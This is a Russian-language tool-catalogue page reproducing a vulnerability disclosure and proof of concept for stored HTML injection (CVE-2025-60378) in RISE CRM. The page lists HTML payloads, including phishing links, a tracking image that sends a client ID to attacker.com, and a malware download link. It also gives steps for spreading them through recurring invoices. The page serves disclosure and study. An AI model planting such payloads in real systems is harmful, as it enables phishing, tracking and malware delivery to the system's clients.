Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-60378 — Доказательство концепции для хранимой HTML-инъекции в RISE CRM, демонстрирующее, как аутентифицированные пользователи могут внедрять вредоносный HTML в счета и сообщения, что приводит к фишингу и распространению вредоносного ПО через автоматические электронные письма и PDF-файлы. | Kitploit
Инструменты/GitHubGitHub/ajansha/cve-2025-60378
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийФишингВеб-безопасностьОбучение и Образование
GitHubajansha/cve-2025-60378

CVE-2025-60378

Доказательство концепции для хранимой HTML-инъекции в RISE CRM, демонстрирующее, как аутентифицированные пользователи могут внедрять вредоносный HTML в счета и сообщения, что приводит к фишингу и распространению вредоносного ПО через автоматические электронные письма и PDF-файлы.

Репозиторий
180 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-60378: Хранимая HTML-инъекция в RISE Ultimate Project Manager & CRM

⚠️ Уведомление о безопасности
Критическая уязвимость хранимой HTML-инъекции, затрагивающая счета, обмен сообщениями и автоматические уведомления

CVE Severity CVSS Product


📋 Обзор

Критическая уязвимость хранимой HTML-инъекции обнаружена в RISE Ultimate Project Manager & CRM, которая позволяет аутентифицированным пользователям внедрять вредоносный HTML в позиции счетов, заметки клиентов и модули обмена сообщениями. Внедренный контент сохраняется в базе данных и автоматически отображается в клиентских электронных письмах, PDF-файлах и чат-коммуникациях, что позволяет проводить масштабные фишинговые атаки, компрометацию деловой электронной почты и доставку вредоносного ПО через электронную почту/PDF.

🎯 Затронутые версии

  • Продукт: RISE - Ultimate Project Manager & CRM
  • Уязвимые версии: < 3.9.4
  • Исправленная версия: 3.9.4+

🔍 Детали уязвимости

АтрибутЗначение
CVE IDCVE-2025-60378
ТипХранимая HTML-инъекция
CWECWE-79
Вектор атакиСеть/Удаленно
АутентификацияТребуется (низкие привилегии)
Взаимодействие с пользователемНет
СерьезностьВЫСОКАЯ
CVSS v3.18.1 - Высокая
ОбнаружилAjansha Shankar

Описание

RISE CRM не выполняет надлежащую санитизацию и кодирование HTML-контента в нескольких редактируемых пользователем полях, включая счета, сообщения и заметки клиентов. Когда аутентифицированные пользователи внедряют HTML-полезные нагрузки в эти поля, контент сохраняется в базе данных без адекватной фильтрации. Впоследствии этот вредоносный HTML автоматически отображается в клиентских электронных письмах, PDF-вложениях и модулях обмена сообщениями/чата без надлежащего экранирования. Повторяющиеся счета и автоматические сообщения усиливают атаку, распространяя вредоносный контент одновременно нескольким получателям.

Затронутые компоненты

  • ✗ Позиции счетов (поле описания)
  • ✗ Модуль заметок/сообщений клиента
  • ✗ Система чата и обмена сообщениями
  • ✗ Модуль формирования выписок для клиентов
  • ✗ Автоматическая система электронной почты (повторяющиеся счета, напоминания)
  • ✗ PDF-вложения

Основная причина

  • ❌ Недостаточная санитизация ввода в полях счетов, сообщений и заметок клиентов
  • ❌ Отсутствие кодирования HTML-вывода в шаблонах электронной почты и при генерации PDF
  • ❌ Отсутствие проверки контента перед сохранением в базе данных
  • ❌ Отсутствие ограничений на HTML/JavaScript в коммуникациях с клиентами
  • ❌ Автоматические системы распространяют непроверенный контент без дополнительной фильтрации

💥 Воздействие

Последствия для безопасности

  • 🎣 Масштабный фишинг: Внедренный контент может имитировать легитимные коммуникации и перенаправлять нескольких клиентов на сайты, контролируемые злоумышленником
  • 💼 Компрометация деловой электронной почты: Вредоносные счета и сообщения, отправленные клиентам, выглядят как исходящие из доверенного источника
  • 💬 Скомпрометированный обмен сообщениями: Вредоносные полезные нагрузки в чате/обмене сообщениями достигают членов команды и клиентов напрямую
  • 🦠 Распространение вредоносного ПО: Встроенные вредоносные ссылки или iframe доставляют вредоносное ПО через электронную почту/PDF/обмен сообщениями
  • 🔄 Автоматическое распространение атаки: Повторяющиеся счета и автоматические сообщения обеспечивают доставку полезной нагрузки нескольким получателям без ручного вмешательства
  • 👥 Многовекторная атака: Комбинированные поверхности атаки через электронную почту, PDF и обмен сообщениями повышают вероятность успешной компрометации

Оценка триады CIA

ФакторВоздействиеПояснение
Конфиденциальность🔴 ВЫСОКОЕУчетные данные клиентов и конфиденциальные данные могут быть собраны через фишинг
Целостность🔴 ВЫСОКОЕВредоносный контент может исказить восприятие коммуникаций и деловых отношений
Доступность🟡 НИЗКОЕОграниченное прямое воздействие на доступность системы

Реальные сценарии атак

Сценарий 1: Фишинговая кампания на основе счетов

Злоумышленник с низкими привилегиями менеджера проекта создает счет с вредоносным HTML:

<a href="https://attacker.com/fake-payment">Click here to view payment status</a>

Счет отправляется более чем 100 клиентам через автоматическую электронную почту. Все клиенты получают то, что выглядит как легитимный счет, направляющий их на фишинговый сайт. Злоумышленник одновременно собирает учетные данные от нескольких жертв.

Сценарий 2: Атака через обмен сообщениями

Злоумышленник внедряет вредоносный HTML в сообщение клиенту:

<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Download Updated Project Files</a>

Все члены команды и клиенты получают сообщение в чате и переходят по ссылкам для загрузки вредоносного ПО.

Сценарий 3: Доставка вредоносного ПО через повторяющиеся счета

Злоумышленник настраивает повторяющийся счет с полезной нагрузкой для доставки вредоносного ПО. Каждый месяц клиенты автоматически получают счета со встроенным вредоносным контентом, что обеспечивает постоянный вектор атаки.

🧪 Доказательство концепции

Настройка среды

  • Доступ к панели администратора RISE CRM с правами на создание счетов/сообщений
  • Любая версия до 3.9.4

Шаги PoC

Шаг 1: Доступ к созданию счета или сообщения

Перейдите: Панель управления RISE CRM → Счета/Сообщения → Создать новый

Шаг 2: Внедрение HTML-полезной нагрузки в поле описания/сообщения

<a href="https://attacker.com">Click here to view invoice</a>

Шаг 3: Добавление вредоносного изображения с перенаправлением

<a href="https://evil.com" target="_blank">
  <img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>

Шаг 4: Добавление вводящей в заблуждение стилизации

<h1><font color=red>Visit Our New WebSite</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>

Шаг 5: Настройка повторяющегося распространения

  • Сохраните запись
  • Включите опцию "Повторяющийся" (если доступно для счетов/сообщений)
  • Установите частоту (еженедельно, ежемесячно и т.д.)
  • Система автоматически отправляет всем соответствующим клиентам

Шаг 6: Проверка вектора атаки

  • Проверьте почтовый ящик клиента
  • Проверьте обмен сообщениями/чат клиента
  • Откройте PDF-вложение
  • Наблюдайте отображение вредоносного HTML во всех каналах

Ожидаемый результат

✅ Внедренный HTML отображается в электронных письмах, PDF и обмене сообщениями без экранирования ✅ Ссылки кликабельны и перенаправляют на сайты злоумышленника ✅ Изображения загружаются с серверов, контролируемых злоумышленником ✅ Контент сохраняется во всех будущих коммуникациях с клиентами ✅ Повторяющееся распространение автоматически достигает нескольких получателей

🛡️ Смягчение последствий

Для конечных пользователей

Скачать инструмент